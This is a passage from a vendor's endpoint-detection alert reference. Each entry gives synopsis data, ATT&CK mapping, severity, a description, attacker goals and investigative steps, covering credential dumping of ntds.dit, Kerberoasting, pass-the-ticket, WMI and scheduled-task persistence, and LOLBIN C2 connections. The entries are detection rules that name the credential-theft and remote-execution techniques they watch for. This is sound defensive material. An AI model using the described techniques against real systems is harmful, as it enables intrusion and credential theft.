104 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Scrcons.exe Rare Child Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Windows Management Instrumentation (T1047)

Severity Low

Description
The Windows Management Instrumentation (WMI) standard event consumer scrcons.exe executed a rare
VBScript or PowerShell script. Executing a rare script can be an indication of local or remote code execution
abuse by an attacker.

Attacker's Goals
The attacker is trying to gain Persistence via WMI script registration.

Investigative Actions
Review registered WMI ActiveScriptEventConsumer.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 105
© 2021 Palo Alto Networks, Inc.
Script Connecting to Rare External Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter (T1059)

Severity Medium

Description
Scripts connecting to external IP addresses may be sanctioned IT scripts. However, when those external IP
addresses are only receiving connections from a few specific endpoints in the organization, these scripts
may be an indicator of more suspicious activity. Security testers and adversaries use offensive frameworks
that employ forms of scripting which result in this type of network activity.

Attacker's Goals
Connect its Command and Control server.

Investigative Actions
• Check the external host the script connects to.
• Fetch and investigate the executed script.

106 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Spam Bot Traffic
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 3 Days

Deduplication Period 3 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Impact (TA0040)

ATT&CK Technique Resource Hijacking (T1496)

Severity Low

Description
The endpoint connected to an excessive number of external SMTP servers. A spambot may be trying to
send spam email using multiple SMTP servers. Spambots can cause your domain to be blacklisted, and can
contain other malicious functionality. The same mechanism can also be used for exfiltration. Some VPN
clients can also tunnel data over SMTP. Note: This detection model looks for SMTP connections to external
servers, but the volume of traffic is not considered. A count is performed based on the number of domains
being contacted, as well as the number of unresolved IP addresses.

Attacker's Goals
The attacker uses the host as an SMTP client to send mails and hide their real origin.

Investigative Actions
• Verify that the source is not an SMTP server. If Cortex XDR Analytics has failed to identify the process
as a valid SMTP server, this alert will be a false positive.
• Verify that IP addresses are actually not being resolved by the non-SMTP process. If the process is
performing DNS resolution with a DNS service outside your network, it is possible (depending on your
network topology) that Cortex XDR Analytics will not observe that traffic. Because SMTP services
typically use numerous IP addresses, this situation could cause a process to exceed a limit when it would
otherwise fail to do so.
• If the SMTP connection activity proves to be the result of malicious file activity, search in the Triage
page for other endpoints infected with the file.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 107
© 2021 Palo Alto Networks, Inc.
Sudoedit Brute force attempt
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Privilege Escalation (TA0004)

ATT&CK Technique Exploitation for Privilege Escalation (T1068)

Severity Medium

Description
An unusual amount of sudoedit commands executed in a short period of time. This may indicate an attempt
to exploit CVE-2021-3156.

Attacker's Goals
The attacker may gain higher privileges via exploitation of sudoedit.

Investigative Actions
• Verify that the current version of sudo in not vulnerable to CVE-2021-3156.

108 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Suspicious PowerShell Command Line
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
Attackers often leverage PowerShell one-liners, in which PowerShell is executed with suspicious options on
the command line

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it. For
example, the command line may be an administrative script.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 109
© 2021 Palo Alto Networks, Inc.
Suspicious PowerShell Enumeration of Running
Processes
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Process Discovery (T1057)

Severity Low

Description
Attackers often enumerate running processes to find and disable security tools.

Attacker's Goals
Understand the type of host according to the processes running on it; find and disable security tools.

Investigative Actions
Verify whether the command that was executed is benign or normal for the host and/or user performing it
(for example, it may be an IT script).

110 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Suspicious Process Spawned by Adobe Reader
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Phishing: Spearphishing Attachment (T1566.001)

Severity Low

Description
Unusual process spawned by Adobe Reader with an uncommon command line

Attacker's Goals
An attacker attempts to gain code execution via a phishing document.

Investigative Actions
• Check the source of the document (received by mail or loaded locally).
• Investigate the child processes for malicious activity and network connections to an external host.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 111
© 2021 Palo Alto Networks, Inc.
Suspicious Process Spawned by wininit.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Masquerading (T1036)

Severity Medium

Description
An unusual process was spawned by wininit.exe, possibly indicating malicious local or remote code
execution.

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

112 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Suspicious RunOnce Parent Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
(T1547.001)

Severity Low

Description
Runonce.exe executes commands under the Registry key HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce, typically on computer boot and user login events.

Attacker's Goals
An attacker is trying to perform an action on the system at a later point, achieving persistence.

Investigative Actions
Investigate the endpoint to determine if it's a legitimate process that is supposed to use RunOnce in its
operation.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 113
© 2021 Palo Alto Networks, Inc.
Suspicious SSO access from ASN
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A suspicious SSO authentication attempt was made by a user.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has switched locations and providers).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

114 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Suspicious disablement of the Windows
Firewall
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 7 Days

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Impair Defenses: Disable or Modify System Firewall (T1562.004)

Severity Medium

Description
The Windows Firewall has been disabled. Malware may turn it off to exfiltrate data and communicate with
C2 servers.

Attacker's Goals
An attacker may turn the firewall off to exfiltrate data and communicate with C2 servers.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Investigate the endpoint to determine if the process is legitimately disabling the firewall.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 115
© 2021 Palo Alto Networks, Inc.
Suspicious dump of ntds.dit using Shadow
Copy with ntdsutil/vssadmin
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique OS Credential Dumping: NTDS (T1003.003)

Severity High

Description
Attackers may attempt to dump the ntds.dit file, which stores all Active Directory account information, to
later extract passwords and hashes from it.

Attacker's Goals
Retrieve Active Directory data, to perform malicious activities such as lateral movement.

Investigative Actions
Check the initiator process for additional suspicious activity.

116 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Suspicious process accessed a site
masquerading as Google
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Command and Control (TA0011)


• Defense Evasion (TA0005)

ATT&CK Technique • Web Service: Bidirectional Communication (T1102.002)


• Masquerading (T1036)

Severity Low

Description
Suspicious process accessed a site masquerading as Google

Attacker's Goals
Masquerade legitimate looking Google services for defense evasion and C&C.

Investigative Actions
• See whether this site has a malicious reputation.
• Follow process activities.
• Monitor traffic to the site.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 117
© 2021 Palo Alto Networks, Inc.
Suspicious process execution by scheduled
task
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 10 Days

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Scheduled Task/Job (T1053)

Severity Low

Description
An unpopular unsigned process was executed by a scheduled task

Attacker's Goals
Attackers may attempt to gain persistence on the endpoint using scheduled tasks.

Investigative Actions
• Review the process executed by the schedule task.
• Investigate the specific scheduled task execution chain.

118 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
TGT reuse from different hosts (pass the ticket)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Hours

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Use Alternate Authentication Material: Pass the Ticket (T1550.003)

Severity Low

Description
We observed two different hosts sending TGS using the same TGT. This may indicate a TGT was stolen and
passed to another host.

Attacker's Goals
Lateral movement using stolen user-account credentials.

Investigative Actions
Check if the mentioned hosts are not the same, and investigate if the ticket was stolen from one of them.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 119
© 2021 Palo Alto Networks, Inc.
UNIX LOLBIN connecting to a rare host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Informational

Description
A UNIX LOLBIN connected to an external IP address or host, which is rarely connected to from the
organization.

Attacker's Goals
Beacon to C2 server and/or exfiltrate data.

Investigative Actions
Check whether the process was injected to or otherwise subverted for malicious use.

120 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Uncommon ARP cache listing via arp.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique System Network Configuration Discovery (T1016)

Severity Low

Description
The arp.exe command is used to display and modify entries in the Address Resolution Protocol (ARP) cache.
Adversaries may attempt to use the command to discover remote systems they could compromise.

Attacker's Goals
Adversaries may attempt to use the command to discover remote systems they could compromise.

Investigative Actions
Check whether the initiating process is allowed in your organization. (If the parent process is cmd.exe, check
the process that spawned it).

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 121
© 2021 Palo Alto Networks, Inc.
Uncommon IP Configuration Listing via
ipconfig.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique System Network Configuration Discovery (T1016)

Severity Low

Description
The 'ipconfig' command is used to display TCP/IP network configuration information and refresh the
Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Adversaries may
use the command to discover network configuration details.

Attacker's Goals
Attackers can use the ipconfig command to discover network configuration details.

Investigative Actions
• Check whether the initiator process is benign or normal for the host and/or user performing it.
• Check whether additional discovery commands were executed from the same process.

122 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Uncommon Service Create/Config
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique System Services: Service Execution (T1569.002)

Severity Medium

Description
The Service Control command (sc.exe) is used to create, start, stop, query, or delete Windows services.
Adversaries may attempt to use the command to execute and persist a binary, command, or script.

Attacker's Goals
Evading security controls and possibly persisting malware.

Investigative Actions
Check whether the service created, or the configuration change to an existing service, is benign or normal
for the host and/or user performing it.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 123
© 2021 Palo Alto Networks, Inc.
Uncommon local scheduled task creation via
schtasks.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Scheduled Task/Job (T1053)

Severity Low

Description
The schtasks.exe command enables creating, deleting, querying, changing, running, and ending scheduled
tasks on a local or remote computer. Adversaries may attempt to use the command to gain persistence on
this host using scheduled tasks.

Attacker's Goals
Attackers may attempt to use the command to gain persistence on the endpoint using scheduled tasks.

Investigative Actions
• Review the process that creates the schedule task.
• Investigate the specific scheduled task execution chain.

124 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Uncommon net group execution
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Permission Groups Discovery (T1069)

Severity Medium

Description
The 'net group' command is used to add, display, or modify domain-level groups. Adversaries may attempt
to use the command to find domain-level groups and permissions settings or modify domain-level group
memberships.

Attacker's Goals
Attackers may attempt to use the command to find domain-level groups and permissions settings or modify
domain-level group memberships.

Investigative Actions
• Check if the queried group is a sensitive one (e.g. administrators).
• Check whether the initiating process has executed additional discovery commands.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 125
© 2021 Palo Alto Networks, Inc.
Uncommon remote scheduled task creation
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Scheduled Task/Job (T1053)

Severity High

Description
The schtasks.exe command enables creating, deleting, querying, changing, running, and ending scheduled
tasks on a local or remote computer. Adversaries may attempt to use the command to execute programs or
persist malware on remote machines.

Attacker's Goals
Attackers can attempt to use the command to execute programs or persist malware on remote endpoints.

Investigative Actions
• Investigate the initiator process and whether it should create remote tasks.
• Investigate the scheduled task execution on the remote machine.

126 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Uncommon remote service start via sc.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique System Services: Service Execution (T1569.002)

Severity Low

Description
The Service Control command (sc.exe) is used to create, start, stop, query, or delete Windows services.
Adversaries may attempt to use the command to execute and persist a binary, command, or script.

Attacker's Goals
The Service Control command is used to create, start, stop, query, or delete Windows services. Attackers
can use the command to attempt to execute and persist a binary, command, or script.

Investigative Actions
• Check whether the executed process is benign and if this was desired behavior as part of its normal
execution flow.
• Check the remote host for any evidence of the executed service and investigate it.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 127
© 2021 Palo Alto Networks, Inc.
Uncommon routing table listing via route.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique System Network Configuration Discovery (T1016)

Severity Low

Description
The route.exe command is used to display and modify entries in the local IP routing table. Adversaries may
attempt to use the command to discover remote systems they could compromise.

Attacker's Goals
Attackers can attempt to use the command to discover remote systems they could compromise.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it (e.g.
an IT script).

128 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Uncommon user management via net.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Discovery (TA0007)


• Persistence (TA0003)

ATT&CK Technique • Account Discovery (T1087)


• Create Account (T1136)

Severity Low

Description
The net.exe command is used to add, delete, and otherwise manage the users on a computer. Adversaries
may attempt to use the command to discover or add local and domain user accounts.

Attacker's Goals
Attackers may attempt to use the command to discover or add local and domain user accounts. The created
accounts are to gain additional access to endpoints within your network.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Check whether the user in the command line is an administrator or other sensitive account.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 129
© 2021 Palo Alto Networks, Inc.
Unicode RTL Override Character
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Obfuscated Files or Information (T1027)

Severity Medium

Description
An attacker may use a special right-to-left (RTL) override character to trick users into executing malicious
files that look like benign file types.

Attacker's Goals
Trick users into executing malicious files by making their file types seem benign.

Investigative Actions
Investigate the executed process causality group. There is no reason for benign files to contain the Unicode
right-to-left override character in their name.

130 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Unusual Lolbins Process Spawned by
InstallUtil.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Signed Binary Proxy Execution: InstallUtil (T1218.004)

Severity Low

Description
An unusual process was spawned by InstallUtil.exe, possibly indicating malicious local or remote code
execution.

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 131
© 2021 Palo Alto Networks, Inc.
Unusual process accessed the PowerShell
history file
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
An abnormal process accessed the PowerShell console history file. This may be a sign of malicious
PowerShell execution without directly invoking the powershell.exe binary.

Attacker's Goals
An attacker is attempting to run PowerShell without powershell.exe to evade detection.

Investigative Actions
• Investigate the process and command line executed and whether it's benign or normal for this host.

132 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Unusual weak authentication by user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Use Alternate Authentication Material (T1550)

Severity Informational

Description
A user account authenticated to a host via NTLMv1 or LM authentication for the first time in the past 30
days. This may be indicative of an NTLM downgrade attack A downgrade attack may force the client to
authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2.

Attacker's Goals
The attacker attempts to gain access to the accounts.

Investigative Actions
• Audit all login events with a weaker protocol and review any anomalous usage.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 133
© 2021 Palo Alto Networks, Inc.
Unverified domain added to Azure AD
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data Azure Audit Log

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Account Manipulation: Additional Cloud Credentials (T1098.001)

Severity Low

Description
A new unverified domain has been added to Azure AD

Attacker's Goals
An attacker attempts to change Active Directory configuration for persistence or defense evasion.

Investigative Actions
• Check if the new domain is known for the organization.
• Check whether the user changing the configuration is permitted.

134 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
User attempted to connect from a suspicious
country
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic • Credential Access (TA0006)


• Resource Development (TA0042)

ATT&CK Technique • Compromise Accounts (T1586)


• Brute Force: Password Guessing (T1110.001)

Severity Informational

Description
A user connected from an unusual country. This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed its traffic there via a VPN.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 135
© 2021 Palo Alto Networks, Inc.
User connected from a new country
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic • Credential Access (TA0006)


• Resource Development (TA0042)

ATT&CK Technique • Compromise Accounts (T1586)


• Brute Force: Password Guessing (T1110.001)

Severity Informational

Description
A user connected from an unusual country that the user has not connected from before. This may indicate
the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed its traffic there via a VPN.

136 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
User successfully connected from a suspicious
country
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts (T1078)

Severity Low

Description
A user successfully connected from an unusual country. This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed its traffic there via a VPN.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 137
© 2021 Palo Alto Networks, Inc.
Vulnerable driver loaded
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 7 Days

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Privilege Escalation (TA0004)

ATT&CK Technique Exploitation for Privilege Escalation (T1068)

Severity Medium

Description
A new and uncommon driver that is vulnerable was loaded. Attackers may install a legitimate kernel driver
and exploit its vulnerability to gain kernel access.

Attacker's Goals
Gain code execution on the host kernel.

Investigative Actions
• Check whether the driver was installed by IT / User.
• Check if the host has the device of the driver - driver for Lenovo and the PC host brand is Asus.
• Check driver file creation time and if in that time legitimate operations occur.

138 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Weakly-Encrypted Kerberos Ticket Requested
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)

Severity Low

Description
A user specifically requested weak and deprecated encryption in a Kerberos TGS request. This provides
easy-to-crack hashes, and is typically a sign of a Kerberoasting attack.

Attacker's Goals
Crack account credentials by obtaining an easy-to-crack Kerberos ticket.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool requesting weak
Kerberos encryption.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 139
© 2021 Palo Alto Networks, Inc.
Windows Installer exploitation for local
privilege escalation
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Privilege Escalation (TA0004)

ATT&CK Technique Exploitation for Privilege Escalation (T1068)

Severity Medium

Description
The Windows installer (msiexec.exe) was likely exploited to run a malicious rollback script (.rbs file) instead
of the original. Users should not be able to modify config.msi during the installation process, only SYSTEM
should have access to it.

Attacker's Goals
An attacker is attempting to gain SYSTEM privileges.

Investigative Actions
• Investigate the actor process SID and path and whether it's benign or normal for this host.
• This action is not common, but allowed on Windows versions older than Windows 8. On those systems,
check the file reputation for both the CGO and OS actor executables that ran the installation.

140 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
WmiPrvSe.exe Rare Child Command Line
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)


• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)


• Remote Services: Windows Remote Management (T1021.006)
• Windows Management Instrumentation (T1047)

Severity Medium

Description
A remote WMI command executed a binary proxy, the Windows Management Instrumentation (WMI)
Provider Host wmiprvse.exe, which executed a rare child command line. Executing a rare child process can
be an indication of remote code execution abuse by an attacker.

Attacker's Goals
Gain code execution on a remote host.

Investigative Actions
• Investigate the processes being spawned from WmiPrvse.exe on the host for malicious indicators.
• Correlate the RPC call from the source host and understand what initiated it.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 141
© 2021 Palo Alto Networks, Inc.
Wsmprovhost.exe Rare Child Process
The Wsmprovhost.exe Rare Child Process alert indicates a remote WMI command executed a binary proxy,
which executed a rare child process which can indicate remote code execution abuse by an attacker.

Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)


• Execution (TA0002)

ATT&CK Technique • Remote Services: Windows Remote Management (T1021.006)


• Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
The PowerShell host wsmprovhost.exe is a proxy process executed remotely through PowerShell when
using Windows Remote Management (WinRM). It has executed a rare child process, which may indicate
remote code execution abuse by an attacker.

Attacker's Goals
Gain code execution on a remote host.

Investigative Actions
• Investigate the processes being spawned from Wsmprovhost.exe on the host for malicious indicators.
• Correlate the initiator process (most likely PowerShell) to the source host and investigate it.

142 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference

You might also like